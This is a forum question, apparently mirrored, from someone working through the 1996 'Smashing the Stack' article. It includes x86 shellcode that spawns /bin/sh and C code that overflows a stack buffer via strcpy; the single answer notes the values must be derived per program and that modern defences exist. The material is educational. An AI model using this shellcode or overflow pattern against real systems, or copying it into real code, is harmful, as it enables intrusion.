Using strcpy & buffer overflow to execute shell code
Question
I've been going through "Smashing the stack for fun and profit" and am having issues executing shell code through a buffer overflow.
Running on Linux, Ubuntu 32bit via VirtualBox gcc compiler with -fno-stack-protector -ggdb -g tags
My code is identical to the reading and I don't understand why it's not working. I get a segmentation fault. When I use gbd to debug it says "0x08048268 in ??" which I know means it can't find the address in the scope. I don't understand why it shouldn't be able to.
I am compiling with stack guard off as well.
char shellcode[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
char large_string[128];
void main() {
char buffer[96];
int i;
long *long_ptr = (long *) large_string;
for (i = 0; i < 32; i++)
*(long_ptr + i) = (int) buffer;
for (i = 0; i < strlen(shellcode); i++)
large_string[i] = shellcode[i];
large_string[127] = '\0';
strcpy(buffer,large_string);
}
1 answers
solution1
2 2015-09-24 07:20:05
That's an old article, but I've cited it too. The problem is that your code is “identical to the reading.” Those aren't magic numbers from a script. Pay close attention to how Aleph One determined which values to smash the stack with for that program.
And keep in mind that the article is from 1996, and the kernel and GCC devs have read it too.
The technical post webpages of this site follow the CC BY-SA 4.0 protocol. If you need to reprint, please indicate the site URL or the original address.Any question please contact:yoyou2525@163.com.